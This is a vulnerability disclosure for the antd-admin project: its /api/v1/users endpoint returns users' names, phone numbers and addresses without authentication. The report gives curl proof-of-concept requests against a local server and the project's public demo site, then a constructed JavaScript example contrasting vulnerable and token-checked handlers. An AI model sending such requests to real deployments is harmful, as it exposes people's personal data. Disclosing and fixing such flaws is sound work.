Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information
Install according to the official documentation.
2.1 Unauthorized access is found on some interfaces. For example:
/api/v1/users
The PoC is:
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' http://192.168.0.125:7001/api/v1/users
2.2 At this point you can see information returned, such as the user ID, name, age, phone number, address and other sensitive information.
2.3 It can also be reproduced on the official sample site https://antd-admin.zuiidea.com/login?from=
The PoC is:
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://antd-admin.zuiidea.com/api/v1/users
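As an added illustration (not code from the antd-admin project or from the reporter), the following shows the pattern the report describes: a /api/v1/users handler that returns user records to any caller, next to a hardened handler that checks a session token before touching the data, plus a small check that probes a handler the way the curl PoC does (no Authorization header) and lists the sensitive fields it leaks. The user table, session store, request objects and the choice of a bearer token are all constructed assumptions for this example.

```javascript
'use strict';

// Constructed sample data mirroring the fields the report says leak.
const USERS = [
  { id: 1, name: 'Alice', age: 31, phone: '555-0101', address: '1 Main St' },
  { id: 2, name: 'Bob', age: 42, phone: '555-0102', address: '2 High St' },
];

// Hypothetical server-side session store: token -> user id.
const SESSIONS = new Map([['s3cr3t-session-token', 1]]);

// Vulnerable handler: no authentication check at all, so an anonymous
// request (the curl in the PoC) gets the full user list.
function handleUsersVulnerable(req) {
  return { status: 200, body: USERS };
}

// Pull a bearer token out of the Authorization header, or null if absent.
function bearerToken(req) {
  const h = (req.headers && req.headers.authorization) || '';
  const m = /^Bearer\s+(\S+)$/i.exec(h);
  return m ? m[1] : null;
}

// Hardened handler: reject anonymous callers before reading the data.
function handleUsersHardened(req) {
  const token = bearerToken(req);
  if (!token || !SESSIONS.has(token)) {
    return { status: 401, body: { error: 'authentication required' } };
  }
  return { status: 200, body: USERS };
}

// Fields a reviewer would treat as sensitive when scanning a response.
const SENSITIVE_FIELDS = ['phone', 'address'];

// Probe a handler with an unauthenticated request, exactly like the PoC
// (a browser User-Agent, no credentials), and return the sensitive fields
// that came back. An empty list means nothing leaked to anonymous callers.
function leakedFields(handler) {
  const anon = { headers: { 'user-agent': 'Mozilla/5.0' } };
  const res = handler(anon);
  if (res.status !== 200 || !Array.isArray(res.body)) return [];
  const found = new Set();
  for (const rec of res.body) {
    for (const f of SENSITIVE_FIELDS) if (f in rec) found.add(f);
  }
  return [...found].sort();
}

// Stand-alone run: show both handlers side by side.
console.log('vulnerable leaks:', leakedFields(handleUsersVulnerable));
console.log('hardened leaks:  ', leakedFields(handleUsersHardened));
```

The check only reports fields that came back in a 200 response to an unauthenticated request, so it distinguishes "endpoint is protected" (401) from "endpoint answers but with no sensitive data" (empty list) from the reported case (phone and address present).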